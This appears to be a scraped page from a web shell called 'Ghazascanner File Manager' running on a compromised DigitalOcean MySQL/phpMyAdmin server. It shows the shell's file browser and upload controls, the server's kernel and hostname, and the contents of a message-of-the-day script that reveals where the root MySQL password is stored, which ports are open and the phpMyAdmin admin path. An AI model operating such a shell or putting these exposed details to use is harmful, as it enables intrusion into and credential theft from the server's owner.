@Ghazascanner
_2019runbot
Ghazascanner File Manager
server :Linux phpmyadmin-ubuntu-m-2vcpu-16gb-blr1-01 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Current Path :
/
etc
/
update-motd.d
/
Path :
Upload File :
New :
File
Dir
//etc/update-motd.d/99-one-click
#!/bin/sh # # Configured as part of the DigitalOcean 1-Click Image build process . /root/.digitalocean_password myip=$(hostname -I | awk '{print$1}') cat <<EOF ******************************************************************************** Welcome to DigitalOcean's 1-Click MySQL/phpMyAdmin Droplet. To keep this Droplet secure, the UFW firewall is enabled. All ports are BLOCKED except 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL). In a web browser, you can view: * The MySQL/phpMyAdmin 1-Click Quickstart guide MySQL: https://do.co/3lAhrFF#start PhpMyAdmin: https://do.co/30ZWR9H#start * phpMyAdmin: http://$myip/phpmyadmin Username: admin Password: $admin_mysql_pass On the server: * The MySQL root password is saved in /root/.digitalocean_password * Certbot is preinstalled. Run it to configure HTTPS. * A default HTML page is located at /var/www/html/index.html and can be removed or replaced. For help and more information, visit https://do.co/3lAhrFF ******************************************************************************** To delete this message of the day: rm -rf $(readlink -f ${0}) EOF